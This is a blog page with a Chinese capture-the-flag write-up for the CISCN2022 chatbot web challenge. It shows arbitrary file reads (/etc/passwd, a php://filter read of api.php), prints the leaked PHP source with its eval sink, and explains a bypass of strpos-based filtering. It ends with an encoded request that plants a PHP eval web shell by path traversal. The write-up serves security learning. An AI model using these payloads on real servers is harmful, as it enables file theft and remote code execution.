<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta name="google-site-verification" content="TZE0rZyIqLl10trYu3BWBWa1Vmz6HFwhb2OcNEK4u-s" />
     <link rel="shortcut icon" href= /img/favicon.ico >
    <title>
        Sk1y&#39;s Blog
    </title>
    <meta name="description" content= Sk1y's blog >
    <meta name="keywords" content= Blog,Hexo,Theme,coder,Sk1y >
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">


<meta name="generator" content="Hexo 6.2.0"></head>
<body id="bodyx">
    <div class="hd posts">

    <a href="/index.html"><i class="fa fa-home
 replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            ciscn2022-web-会聊天的机器人
        </p>
        <hr>
    </div>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CISCN2022-%E5%8D%8E%E4%B8%9C%E5%8C%97-%E4%BC%9A%E8%81%8A%E5%A4%A9%E7%9A%84%E6%9C%BA%E5%99%A8%E4%BA%BA"><span class="toc-text">CISCN2022-华东北-会聊天的机器人</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%99%E6%9C%A8%E9%A9%AC"><span class="toc-text">写木马</span></a></li></ol></li></ol></li></ol>
    <div class="post-content">
        <h1 id="CISCN2022-华东北-会聊天的机器人"><a href="#CISCN2022-华东北-会聊天的机器人" class="headerlink" title="CISCN2022-华东北-会聊天的机器人"></a>CISCN2022-华东北-会聊天的机器人</h1><p>可以上传词库规则，然后和机器人对话，就会去进行查找，并且回复</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123; <span class="string">&quot;你好&quot;</span>: &#123;<span class="string">&quot;string&quot;</span>: <span class="string">&quot;你好ctfer！&quot;</span>&#125;, <span class="string">&quot;1&quot;</span>: &#123;<span class="string">&quot;image&quot;</span>: <span class="string">&quot;/etc/passwd&quot;</span>&#125;, <span class="string">&quot;2&quot;</span>:&#123;<span class="string">&quot;calc&quot;</span>:<span class="string">&quot;1+1&quot;</span>&#125; &#125;</span><br></pre></td></tr></table></figure>



<p>这里注意iamge，我们可以传入一个图片的链接，然后机器人会去访问，并且返回，所以我们这里尝试访问<code>/etc/passwd</code>，进行base64解码就可以获取</p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/202207142134821.png" alt="image-20220714192927092"></p>
<p>所以尝试任意文件读取，但是不能读取&#x2F;flag，可能是路径问题，或者权限问题</p>
<p>继续看calc功能，尝试一下，回显<code>admin才能使用这个功能</code></p>
<p>还是那个读取文件的东西，使用php伪协议读取api.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php:<span class="comment">//filter/read=convert.base64-encode/resource=/var/www/html/api.php</span></span><br></pre></td></tr></table></figure>

<p>得到api.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">init</span>();</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">init</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$sesspath</span> = <span class="string">&quot;/tmp/session&quot;</span>;</span><br><span class="line">    <span class="title function_ invoke__">session_save_path</span>(<span class="variable">$sesspath</span>);   <span class="comment">//session存放地址</span></span><br><span class="line">    <span class="title function_ invoke__">session_start</span>();</span><br><span class="line">    <span class="keyword">if</span> (!<span class="variable">$_SESSION</span>[<span class="string">&#x27;cname&#x27;</span>])</span><br><span class="line">        <span class="variable">$_SESSION</span>[<span class="string">&#x27;cname&#x27;</span>] = <span class="string">&#x27;ck&#x27;</span>;</span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">file_dir_exists</span>(<span class="string">&quot;/tmp/resource&quot;</span>))</span><br><span class="line">        <span class="title function_ invoke__">mkdir</span>(<span class="string">&quot;/tmp/resource&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">file_dir_exists</span>(<span class="params"><span class="variable">$path</span></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$dir</span> = <span class="title function_ invoke__">dir</span>(<span class="variable">$path</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$dir</span>)</span><br><span class="line">        <span class="keyword">if</span> (<span class="variable">$dir</span>-&gt;<span class="title function_ invoke__">read</span>())</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">is_file</span>(<span class="variable">$path</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getres</span>(<span class="params"><span class="variable">$input</span></span>)</span>&#123;</span><br><span class="line">    <span class="title function_ invoke__">log_write</span>(<span class="variable">$input</span>);</span><br><span class="line">    <span class="title function_ invoke__">chdir</span>(<span class="string">&quot;/tmp/resource/&quot;</span>);</span><br><span class="line">    <span class="variable">$path</span> = <span class="variable">$_SESSION</span>[<span class="string">&#x27;cname&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">file_dir_exists</span>(<span class="variable">$path</span>))&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;请先上传词库文件。&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$ck</span> = <span class="title function_ invoke__">json_decode</span>(<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$path</span>),<span class="literal">true</span>);</span><br><span class="line">    <span class="keyword">foreach</span> (<span class="variable">$ck</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">strstr</span>(<span class="variable">$key</span>,<span class="variable">$input</span>) <span class="keyword">or</span> <span class="title function_ invoke__">strstr</span>(<span class="variable">$input</span>,<span class="variable">$key</span>))&#123;</span><br><span class="line">            <span class="variable">$type</span> = <span class="title function_ invoke__">key</span>(<span class="variable">$value</span>);</span><br><span class="line">            <span class="variable">$v</span> = <span class="variable">$value</span>[<span class="variable">$type</span>];</span><br><span class="line">            <span class="keyword">switch</span> (<span class="variable">$type</span>)&#123;</span><br><span class="line">                <span class="keyword">case</span> <span class="string">&quot;string&quot;</span>:</span><br><span class="line">                    <span class="keyword">return</span> <span class="variable">$v</span>;</span><br><span class="line">                <span class="keyword">case</span> <span class="string">&quot;image&quot;</span>:</span><br><span class="line">                    <span class="variable">$b64img</span> = <span class="string">&#x27;&lt;img src=&quot;data:image/png;base64,&#x27;</span>.<span class="title function_ invoke__">base64_encode</span>(<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$v</span>)) . <span class="string">&#x27;&quot;/&gt;&#x27;</span>;      <span class="comment">//文件获取，然后以base64形式返回给客户端</span></span><br><span class="line">                    <span class="keyword">return</span> <span class="variable">$b64img</span>;</span><br><span class="line">                <span class="keyword">case</span> <span class="string">&quot;calc&quot;</span>:</span><br><span class="line">                    <span class="keyword">if</span> (<span class="variable">$_SESSION</span>[<span class="string">&#x27;is_admin&#x27;</span>])&#123;</span><br><span class="line">                        <span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/\(|\)|\&#x27;|\&quot;/im&quot;</span>,<span class="variable">$v</span>))&#123;</span><br><span class="line">                            <span class="keyword">return</span> <span class="string">&quot;包含非法字符&quot;</span>;</span><br><span class="line">                        &#125;</span><br><span class="line">                        <span class="keyword">return</span> <span class="keyword">eval</span>(<span class="string">&quot;return <span class="subst">$v</span>;&quot;</span>);      <span class="comment">//这个应该是利用点，执行任意命令，但是需要$_SESSION[&#x27;is_admin&#x27;]存在</span></span><br><span class="line">                    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">                        <span class="keyword">return</span> <span class="string">&quot;admin才能使用这个功能&quot;</span>;</span><br><span class="line">                    &#125;</span><br><span class="line">                <span class="keyword">default</span>:</span><br><span class="line">                    <span class="keyword">return</span> <span class="string">&quot;这个动作暂时还没能实现&quot;</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;没有匹配到词库消息&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">uploadc</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$data</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;uploadc&#x27;</span>];</span><br><span class="line">    <span class="variable">$filename</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;cname&#x27;</span>];</span><br><span class="line">    <span class="variable">$resourcedir</span> = <span class="string">&quot;/tmp/resource/&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">file_dir_exists</span>(<span class="variable">$resourcedir</span>))      <span class="comment">//规则存放地址</span></span><br><span class="line">        <span class="title function_ invoke__">mkdir</span>(<span class="variable">$resourcedir</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">strpos</span>(<span class="variable">$data</span>,<span class="string">&quot;&lt;&quot;</span>))&#123;  <span class="comment">//关键词过滤</span></span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;别这样！&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">strpos</span>(<span class="variable">$filename</span>,<span class="string">&quot;.&quot;</span>))&#123;      <span class="comment">//关键词过滤</span></span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;别这样！&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$_SESSION</span>[<span class="string">&#x27;cname&#x27;</span>] = <span class="variable">$filename</span>;     <span class="comment">//对$_SESSION[&#x27;cname&#x27;]进行更新</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$resourcedir</span>.<span class="variable">$filename</span>,<span class="variable">$data</span>)) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;上传成功&quot;</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;上传失败&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">log_write</span>(<span class="params"><span class="variable">$msg</span></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$logpath</span> = <span class="string">&quot;log.txt&quot;</span>;</span><br><span class="line">    <span class="variable">$oper</span> = <span class="title function_ invoke__">session_id</span>();</span><br><span class="line">    <span class="variable">$opername</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$oper</span>,<span class="number">0</span>,<span class="number">1</span>) ;</span><br><span class="line">    <span class="keyword">for</span> (<span class="variable">$i</span>=<span class="number">0</span>;<span class="variable">$i</span> &lt;= <span class="title function_ invoke__">strlen</span>(<span class="variable">$oper</span>);<span class="variable">$i</span>++)</span><br><span class="line">        <span class="variable">$opername</span> .= <span class="string">&quot;*&quot;</span>;</span><br><span class="line">    <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$logpath</span>,<span class="string">&quot;<span class="subst">$opername</span> : <span class="subst">$msg</span> \n&quot;</span>,FILE_APPEND);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;input&#x27;</span>]))</span><br><span class="line">    <span class="keyword">echo</span> <span class="title function_ invoke__">getres</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;input&#x27;</span>]);   <span class="comment">//根据输入的input进行相应的操作</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;uploadc&#x27;</span>]))</span><br><span class="line">    <span class="keyword">echo</span> <span class="title function_ invoke__">uploadc</span>();</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;clear&#x27;</span>]))</span><br><span class="line">    <span class="title function_ invoke__">file_put_contents</span>(<span class="string">&quot;log.txt&quot;</span>,<span class="string">&quot;&quot;</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;log&#x27;</span>]))</span><br><span class="line">    <span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;log.txt&quot;</span>);</span><br></pre></td></tr></table></figure>



<p>可以根据uploadc()获取规则的存放地址</p>
<p>尝试读取</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123; <span class="string">&quot;你好&quot;</span>: &#123;<span class="string">&quot;string&quot;</span>: <span class="string">&quot;你好ctfer！&quot;</span>&#125;, <span class="string">&quot;1&quot;</span>: &#123;<span class="string">&quot;image&quot;</span>: <span class="string">&quot;/tmp/resource/ck&quot;</span>&#125;, <span class="string">&quot;2&quot;</span>:&#123;<span class="string">&quot;calc&quot;</span>:<span class="string">&quot;1+1&quot;</span>&#125; &#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/202207142134509.png" alt="image-20220714200142039"></p>
<h3 id="写木马"><a href="#写木马" class="headerlink" title="写木马"></a>写木马</h3><p>通过uploadc()函数写木马</p>
<p>尽管使用了strpos进行过滤，但是将<code>&lt;</code>和<code>.</code>放在字符串首位就可以使得判别结果为0，从而进行绕过</p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/202207142135740.png" alt="image-20220714211740154"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uploadc=%<span class="number">3</span>C%<span class="number">3</span>Fphp+%<span class="number">40</span><span class="keyword">eval</span>(%<span class="number">24</span>_POST%<span class="number">5</span>B1%<span class="number">5</span>D)%<span class="number">3</span>B%<span class="number">3</span>F%<span class="number">3</span>E&amp;cname=../.../../../../<span class="keyword">var</span>/www/html/xx.php</span><br></pre></td></tr></table></figure>



<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/202207142135366.png" alt="image-20220714213106213"></p>

    </div>
    
        <hr class="fhr">
        <div id="vcomments"></div>
    
</div>


    <div class="footer" id="footer">
    <p><h4>Copyright © 2020 | Author: Sk1y | Theme By <a class="theme-author" target="_blank" rel="noopener" href="https://github.com/Xunzhuo/hexo-theme-coder" style="font-size:14px; color: #969696">Coder</a></h4>
    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        <span id="busuanzi_container_site_pv">Page Views: <span id="busuanzi_value_site_pv"></span></span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv">Unique Visitors: <span id="busuanzi_value_site_uv"></span></span>
    
    <label class="el-switch el-switch-blue el-switch-sm" style="vertical-align: sub;">
        <input type="checkbox" name="switch" id="update_style">
        <span class="el-switch-style"></span>
    </label>

    <!--         <script type="text/javascript">
    var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
    document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
    </script> -->
</p>
</div>

<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="MECC3mIv4gyVBwvpqsAnBsX8-gzGzoHsz">
<input type="hidden" id="valine_appKey" value="KuxLFi0F1Upj5MRy1yo9oAwH">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
color: #698fca;
}
.v .vlist .vcard .vhead .vsys {
color: #3a3e4a;
}
.v .vlist .vcard .vh .vmeta .vat {
color: #638fd5;
}
.v .vlist .vcard .vhead .vnick {
color: #6ba1ff;
}
.v a {
color: #8696b1;
}
.v .vlist .vcard .vhead .vnick:hover {
color: #669bfc;
}
</style>
    <script type="text/javascript" color="173,174,173" opacity='1' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
    <!-- <aside id="toc" class="toc-article" >
      <div class="toc-title">
         <p>
            <span> 目录 </span>
         </p>
      </div>
      
</aside>

<!-- <div style="width:100%;float:left;margin-bottom:25px;">
    <div id="toc" class="toc-article" >
       <div class="toc-title">
          <p>
             <span> 目录 </span>
             <a href="#" onclick="javascript:return openct(this);" title="展开">[+]</a>
          </p>
       </div>
       <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CISCN2022-%E5%8D%8E%E4%B8%9C%E5%8C%97-%E4%BC%9A%E8%81%8A%E5%A4%A9%E7%9A%84%E6%9C%BA%E5%99%A8%E4%BA%BA"><span class="toc-text">CISCN2022-华东北-会聊天的机器人</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%99%E6%9C%A8%E9%A9%AC"><span class="toc-text">写木马</span></a></li></ol></li></ol></li></ol>
    </div>
 </div>
 <script>
    function openct(e){    
       if (e.innerHTML == '[+]') {
          $(e).attr('title', '收起').html('[-]');
          $(".toc-article ol").show();
       } else {
          $(e).attr('title', '展开').html('[+]');
          $(".toc-article ol").hide();
       }
       e.blur();
       return false;
    }
 </script> --> -->
</body>
</html>
